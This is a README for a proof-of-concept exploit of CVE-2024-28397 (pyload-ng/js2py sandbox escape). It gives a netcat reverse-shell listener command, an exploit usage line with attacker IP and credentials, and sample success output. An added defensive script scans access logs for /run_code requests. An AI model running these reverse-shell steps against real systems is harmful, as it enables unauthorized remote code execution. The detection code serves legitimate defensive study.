PoC exploit for CVE-2024-28397 – Remote Code Execution in pyload-ng via js2py sandbox escape

# 🚨 Remote Code Execution – CVE-2024-28397 (pyload-ng / js2py)
This repository contains a **Proof-of-Concept (PoC)** exploit for **CVE-2024-28397**, a Remote Code Execution vulnerability affecting **pyload-ng** due to insecure usage of **js2py**.
> ⚠️ **Disclaimer:**
> This PoC is for **educational and research purposes only**.
> Do not use it on systems you do not own or have explicit permission to test.
> The author is **not responsible** for any misuse of this code.
---
## 🐛 Vulnerability Details
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Component:** `js2py` in `pyload-ng`
- **Impact:** Remote Code Execution (RCE)
- **Attack Vector:** Malicious JS payload escapes the js2py sandbox and executes arbitrary system commands.
---
## 📦 Requirements & Setup
You will need **Python 3.x**, the `requests` library, and `netcat` for catching the reverse shell.
- 🖥️ Target → Vulnerable pyload-ng instance with `/run_code` endpoint accessible
## 🎧 Listener → Start before running exploit:
```bash
nc -lvnp 4444
```
## 🖥️ Usage:
```bash
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123
```
## 📌 Example Output:
- [+] Register successful!
- [+] Login successful
- [+] exploit worked
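
A defender-side check for the exposure described above, as an added example that is not part of the original repository: it scans web access logs for requests to the `/run_code` endpoint from clients outside an allow-list. The combined log format, the `ALLOWED_NETS` ranges and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Assumption: only these networks should ever reach /run_code (hypothetical admin ranges).
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("127.0.0.0/8")]

# Assumption: combined log format (client, timestamp, request line, status).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_allowed(ip_text):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # unparsable client field: treat as untrusted
    return any(ip in net for net in ALLOWED_NETS)

def find_run_code_hits(lines):
    """Return {client_ip: [(timestamp, method, status), ...]} for /run_code
    requests made by clients outside ALLOWED_NETS."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        # Compare the path without query string or trailing slash.
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path.lower() == "/run_code" and not is_allowed(m["ip"]):
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

# Constructed sample log lines (documentation-range addresses), not from a real system.
SAMPLE_LOG = [
    '10.1.2.3 - - [12/Mar/2025:10:00:01 +0000] "POST /run_code HTTP/1.1" 200 17 "-" "curl/8.0"',
    '203.0.113.50 - - [12/Mar/2025:10:02:11 +0000] "GET /index HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [12/Mar/2025:10:02:15 +0000] "POST /run_code HTTP/1.1" 200 17 "-" "python-requests/2.31"',
    '198.51.100.7 - - [12/Mar/2025:10:05:40 +0000] "POST /run_code/?x=1 HTTP/1.1" 403 9 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for ip, events in find_run_code_hits(SAMPLE_LOG).items():
        for ts, method, status in events:
            print(f"ALERT {ip} {method} /run_code status={status} at {ts}")
```

A 2xx status on a flagged request means the endpoint answered an untrusted client and the host should be reviewed; a 403 or similar shows the request was refused.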